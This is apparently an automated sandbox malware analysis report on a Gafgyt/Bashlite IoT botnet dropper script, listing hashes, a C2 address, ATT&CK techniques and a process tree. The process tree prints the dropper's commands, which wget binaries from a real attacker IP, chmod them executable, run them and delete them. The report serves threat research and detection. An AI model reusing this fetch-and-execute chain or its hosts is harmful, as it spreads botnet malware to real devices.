gafgyt | 6bc1fdcba425416e5c1986bc29d170befb5253f177ed08ee06701a943a3df8a4

Analysis

max time kernel
102s
max time network
128s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240729-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
09/03/2025, 04:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

opticus.sh
Size

2KB
MD5

cce1f6633e5b8d3dcb896051af943a72
SHA1

016e7193a2dd76f6bcaff3c51f479fd1e99ad3c7
SHA256

6bc1fdcba425416e5c1986bc29d170befb5253f177ed08ee06701a943a3df8a4
SHA512

374e49c79e9c4f01cae212788cf75988b5c0a6269e4a0786c7ed9b38c3a37e8003c77d68c81636990c74e199d4d524512b2132866cdba495f5c45c09a3d84bc2

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

196.251.80.231:839

Signatures

Detected Gafgyt variant 11 IoCs

resource	yara_rule
behavioral1/files/fstream-1.dat	family_gafgyt
behavioral1/files/fstream-2.dat	family_gafgyt
behavioral1/files/fstream-3.dat	family_gafgyt
behavioral1/files/fstream-4.dat	family_gafgyt
behavioral1/files/fstream-5.dat	family_gafgyt
behavioral1/files/fstream-6.dat	family_gafgyt
behavioral1/files/fstream-7.dat	family_gafgyt
behavioral1/files/fstream-8.dat	family_gafgyt
behavioral1/files/fstream-9.dat	family_gafgyt
behavioral1/files/fstream-10.dat	family_gafgyt
behavioral1/files/fstream-13.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1568	chmod
1506	chmod
1511	chmod
1516	chmod
1521	chmod
1532	chmod
1543	chmod
1548	chmod
1527	chmod
1538	chmod
1553	chmod
1558	chmod
1563	chmod

Executes dropped EXE 13 IoCs

ioc	pid	Process
/tmp/m-i.p-s.opticus	1507	opticus.sh
/tmp/m-p.s-l.opticus	1512	opticus.sh
/tmp/s-h.4-.opticus	1517	opticus.sh
/tmp/x-8.6-.opticus	1522	opticus.sh
/tmp/a-r.m-6.opticus	1528	opticus.sh
/tmp/x-3.2-.opticus	1533	opticus.sh
/tmp/a-r.m-7.opticus	1539	opticus.sh
/tmp/p-p.c-.opticus	1544	opticus.sh
/tmp/i-5.8-6.opticus	1549	opticus.sh
/tmp/m-6.8-k.opticus	1554	opticus.sh
/tmp/p-p.c-.opticus	1559	opticus.sh
/tmp/a-r.m-4.opticus	1564	opticus.sh
/tmp/a-r.m-5.opticus	1569	opticus.sh

Reads system routing table 1 TTPs 2 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	x-8.6-.opticus
File opened for reading	/proc/net/route	opticus.sh

Reads system network configuration 1 TTPs 2 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	x-8.6-.opticus
File opened for reading	/proc/net/route	opticus.sh

Writes file to tmp directory 13 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/m-p.s-l.opticus	wget
File opened for modification	/tmp/x-8.6-.opticus	wget
File opened for modification	/tmp/a-r.m-6.opticus	wget
File opened for modification	/tmp/x-3.2-.opticus	wget
File opened for modification	/tmp/a-r.m-7.opticus	wget
File opened for modification	/tmp/p-p.c-.opticus	wget
File opened for modification	/tmp/m-6.8-k.opticus	wget
File opened for modification	/tmp/s-h.4-.opticus	wget
File opened for modification	/tmp/i-5.8-6.opticus	wget
File opened for modification	/tmp/p-p.c-.opticus	wget
File opened for modification	/tmp/a-r.m-4.opticus	wget
File opened for modification	/tmp/a-r.m-5.opticus	wget
File opened for modification	/tmp/m-i.p-s.opticus	wget

/tmp/opticus.sh
/tmp/opticus.sh
1⤵
- Executes dropped EXE
- Reads system routing table
- Reads system network configuration
PID:1501
- /usr/bin/wget
  wget http://196.251.80.231/m-i.p-s.opticus
  2⤵
  - Writes file to tmp directory
  PID:1502
- /bin/chmod
  chmod +x m-i.p-s.opticus
  2⤵
  - File and Directory Permissions Modification
  PID:1506
- /tmp/m-i.p-s.opticus
  ./m-i.p-s.opticus
  2⤵
  PID:1507
- /bin/rm
  rm -rf m-i.p-s.opticus
  2⤵
  PID:1509
- /usr/bin/wget
  wget http://196.251.80.231/m-p.s-l.opticus
  2⤵
  - Writes file to tmp directory
  PID:1510
- /bin/chmod
  chmod +x m-p.s-l.opticus
  2⤵
  - File and Directory Permissions Modification
  PID:1511
- /tmp/m-p.s-l.opticus
  ./m-p.s-l.opticus
  2⤵
  PID:1512
- /bin/rm
  rm -rf m-p.s-l.opticus
  2⤵
  PID:1514
- /usr/bin/wget
  wget http://196.251.80.231/s-h.4-.opticus
  2⤵
  - Writes file to tmp directory
  PID:1515
- /bin/chmod
  chmod +x s-h.4-.opticus
  2⤵
  - File and Directory Permissions Modification
  PID:1516
- /tmp/s-h.4-.opticus
  ./s-h.4-.opticus
  2⤵
  PID:1517
- /bin/rm
  rm -rf s-h.4-.opticus
  2⤵
  PID:1519
- /usr/bin/wget
  wget http://196.251.80.231/x-8.6-.opticus
  2⤵
  - Writes file to tmp directory
  PID:1520
- /bin/chmod
  chmod +x x-8.6-.opticus
  2⤵
  - File and Directory Permissions Modification
  PID:1521
- /tmp/x-8.6-.opticus
  ./x-8.6-.opticus
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:1522
- /bin/rm
  rm -rf x-8.6-.opticus
  2⤵
  PID:1525
- /usr/bin/wget
  wget http://196.251.80.231/a-r.m-6.opticus
  2⤵
  - Writes file to tmp directory
  PID:1526
- /bin/chmod
  chmod +x a-r.m-6.opticus
  2⤵
  - File and Directory Permissions Modification
  PID:1527
- /tmp/a-r.m-6.opticus
  ./a-r.m-6.opticus
  2⤵
  PID:1528
- /bin/rm
  rm -rf a-r.m-6.opticus
  2⤵
  PID:1530
- /usr/bin/wget
  wget http://196.251.80.231/x-3.2-.opticus
  2⤵
  - Writes file to tmp directory
  PID:1531
- /bin/chmod
  chmod +x x-3.2-.opticus
  2⤵
  - File and Directory Permissions Modification
  PID:1532
- /bin/rm
  rm -rf x-3.2-.opticus
  2⤵
  PID:1536
- /usr/bin/wget
  wget http://196.251.80.231/a-r.m-7.opticus
  2⤵
  - Writes file to tmp directory
  PID:1537
- /bin/chmod
  chmod +x a-r.m-7.opticus
  2⤵
  - File and Directory Permissions Modification
  PID:1538
- /tmp/a-r.m-7.opticus
  ./a-r.m-7.opticus
  2⤵
  PID:1539
- /bin/rm
  rm -rf a-r.m-7.opticus
  2⤵
  PID:1541
- /usr/bin/wget
  wget http://196.251.80.231/p-p.c-.opticus
  2⤵
  - Writes file to tmp directory
  PID:1542
- /bin/chmod
  chmod +x p-p.c-.opticus
  2⤵
  - File and Directory Permissions Modification
  PID:1543
- /tmp/p-p.c-.opticus
  ./p-p.c-.opticus
  2⤵
  PID:1544
- /bin/rm
  rm -rf p-p.c-.opticus
  2⤵
  PID:1546
- /usr/bin/wget
  wget http://196.251.80.231/i-5.8-6.opticus
  2⤵
  - Writes file to tmp directory
  PID:1547
- /bin/chmod
  chmod +x i-5.8-6.opticus
  2⤵
  - File and Directory Permissions Modification
  PID:1548
- /tmp/i-5.8-6.opticus
  ./i-5.8-6.opticus
  2⤵
  PID:1549
- /bin/rm
  rm -rf i-5.8-6.opticus
  2⤵
  PID:1551
- /usr/bin/wget
  wget http://196.251.80.231/m-6.8-k.opticus
  2⤵
  - Writes file to tmp directory
  PID:1552
- /bin/chmod
  chmod +x m-6.8-k.opticus
  2⤵
  - File and Directory Permissions Modification
  PID:1553
- /tmp/m-6.8-k.opticus
  ./m-6.8-k.opticus
  2⤵
  PID:1554
- /bin/rm
  rm -rf m-6.8-k.opticus
  2⤵
  PID:1556
- /usr/bin/wget
  wget http://196.251.80.231/p-p.c-.opticus
  2⤵
  - Writes file to tmp directory
  PID:1557
- /bin/chmod
  chmod +x p-p.c-.opticus
  2⤵
  - File and Directory Permissions Modification
  PID:1558
- /tmp/p-p.c-.opticus
  ./p-p.c-.opticus
  2⤵
  PID:1559
- /bin/rm
  rm -rf p-p.c-.opticus
  2⤵
  PID:1561
- /usr/bin/wget
  wget http://196.251.80.231/a-r.m-4.opticus
  2⤵
  - Writes file to tmp directory
  PID:1562
- /bin/chmod
  chmod +x a-r.m-4.opticus
  2⤵
  - File and Directory Permissions Modification
  PID:1563
- /tmp/a-r.m-4.opticus
  ./a-r.m-4.opticus
  2⤵
  PID:1564
- /bin/rm
  rm -rf a-r.m-4.opticus
  2⤵
  PID:1566
- /usr/bin/wget
  wget http://196.251.80.231/a-r.m-5.opticus
  2⤵
  - Writes file to tmp directory
  PID:1567
- /bin/chmod
  chmod +x a-r.m-5.opticus
  2⤵
  - File and Directory Permissions Modification
  PID:1568
- /tmp/a-r.m-5.opticus
  ./a-r.m-5.opticus
  2⤵
  PID:1569
- /bin/rm
  rm -rf a-r.m-5.opticus
  2⤵
  PID:1571

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/a-r.m-5.opticus

Filesize
102KB

MD5
13d5afe66fd345dbf95d6b813d533225

SHA1
fc9ac873e974b2c8b5032c0761b950e90c6c1e4f

SHA256
63b79c959ba6eea45e22ce93ceafc0d8dd9c273321ac165adefe47f075a9f5aa

SHA512
d42c1a05ea4fdd7649ea52ee6bc98d72e913cebb9cd38f5d150bbf3469fa42be04e6ab6e570d25d31c2cfd73289d5fa80658c845ca37eb31dc3d5bfa7bf84610

Download Submit
/tmp/a-r.m-6.opticus

Filesize
124KB

MD5
b6dbb2f3a214555b95768de19f1f6fc3

SHA1
bc45a0ce50876b722a0706d87e064e56e2061197

SHA256
524384c337b80d6d65e0ca034eacea1bdcbf48f584bb6a45f0a1ce5b5eff5726

SHA512
8edf5af711f7960dff2245ef07644d7460bb35df4edf95255e637aed120fe97d97b868982cf743a657a650ce8ab295478d5f0df2f381c2c481c4ff302899228d

Download Submit
/tmp/a-r.m-7.opticus

Filesize
96KB

MD5
4782430d9efb94b43c2c951ffa6bc035

SHA1
1a013310a84d23c005298015a9f6a95f562c8f61

SHA256
f52254488814ff24b2479356c69e785f39ba586a39ede84d34b8ec3382c17f7b

SHA512
4223a7f34a78745fe73bb0d89fa358adefbda97a2cfe90edc4ff8e09cc3a326e22e46610789ec092a87bb9bb2a6c2ea29462212d8c6c042c446267a34ef699ed

Download Submit
/tmp/i-5.8-6.opticus

Filesize
99KB

MD5
7e05d392c3dac0533fa63e4c6921c53a

SHA1
34e5021d85755855cbb74ed34e410e0578382dd6

SHA256
d76f62c55f509df7ca196ceae50b2aa58e39be1dceed62366748f66c7d86d503

SHA512
717a396db41566cb84e86d11f0bb7df5ea970b1bff4901ab0081f2d05fa82b18d1fdd8b2e28d95f66211ee2c5f3ed1fc161c288da68ccdc7e4734c3379d99bae

Download Submit
/tmp/m-6.8-k.opticus

Filesize
161KB

MD5
1a0f1649c5a72726c15c936d0c96161c

SHA1
682f18d242c6b04e457f632987556184a048963e

SHA256
bb6caf3168dbf71d44139c123e24d4612fbeaab958d70a5f8434a4a38183f8ab

SHA512
750df932d445399e103d34b88d06477d6a90a3729fd019a761cb0822e1dbfd4467a951c584fda588148e3fb1f314a5ab546918157ef7c349b8c344bf5ceab298

Download Submit
/tmp/m-i.p-s.opticus

Filesize
131KB

MD5
6832023c75f6dff66484d6473d17fb23

SHA1
9ca274e04331fe28319952dca7cb778ce32e372a

SHA256
219439128253379a4311963b5b19c148af7f52caf273526f5b92497b979347ad

SHA512
d2eb287c54fdcdf65fa3140b647beba1221ab08f5a77389ea4e8971f102303b59774d512886293fed6f4e0d6af9e8d76d2653a8490ac7ded4603ad1b4f107312

Download Submit
/tmp/m-p.s-l.opticus

Filesize
131KB

MD5
f6127829f38408360cea52be03ee9293

SHA1
1b37fcf76698950bbf6fada63429ac991f96bd6c

SHA256
58e5d290fb200c05c5d85a03c7f62e75a7ac76730275c642a4cacb7138736fda

SHA512
24563b48f454662f3249fc52ae93d8e0c18bf54ae366ff4caf00c462052f2854877529860eb6aa579d9944bb50cab766e0c06a6c9470af8e9416793d4560a2ca

Download Submit
/tmp/p-p.c-.opticus

Filesize
110KB

MD5
10365051845c7885577faca4383e1696

SHA1
97ca66e3bf3bbb98bbf63832dfd370401e063d28

SHA256
069a5eb840b4786f6edc50d7ee76bc1872771b9c7c30152cc94b276a8e26f5aa

SHA512
abdb53d3208237e39d2e8d5ea759f55daaabd236e7c79cc4f9e2d3bc0b6bdf343b4d4c7362c055239995e9b36d2928b0750482483c825b41591106030450271f

Download Submit
/tmp/s-h.4-.opticus

Filesize
92KB

MD5
92c2c9184c05cea338707dbace5c8a11

SHA1
2491a9d71271b4890e55ac06c309a5f9929cbf86

SHA256
a7b7e2d4edb45c2c5c7097727a96e45fd51c91e913ebd7e721def6ffa4bb87f4

SHA512
5efffede19049d1c3cac8ed4250d0d12bc29bdb93b2a6d97a1ecbaab3da7c9f5fbf1bd5b04075352b5446717a646df98a902655ddcba0ff09d3202648200b8d9

Download Submit
/tmp/x-3.2-.opticus

Filesize
84KB

MD5
7273c44b1fa4c67d578b20201daf3a08

SHA1
6b67d21c5e6d1dada3bb1a6fb144af78a946a16c

SHA256
e9ab4c5775283235c852180f5f485057b92dc3fe9cb73ee56cadc081d0bc4f5a

SHA512
3b6daf2f7dc74ddc1dec29198328006ea623fda271fa7e0da8239cb2c1820b24a94c8824ab501e051b70bfc3971b3e630858af328a38b7784d09a55b24de5b24

Download Submit
/tmp/x-8.6-.opticus

Filesize
97KB

MD5
92a289d6fa890bcbc265d9aae8fca04c

SHA1
e2f93c8c6af1920e3c482811be9a37ee3403c99f

SHA256
8aee4d80ef0d4f29dbd6aa15b47c1ac3696c25db44cc8144963e78e51e7b4826

SHA512
c2f7c23c0a6ba91f0f410a25bcd1f97deda795f10527ee4dd1788983323be6a2bcf2d88cbae77415dca546b050fefa14ef2cd5287a3e6d2a21b934c0562057ea

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads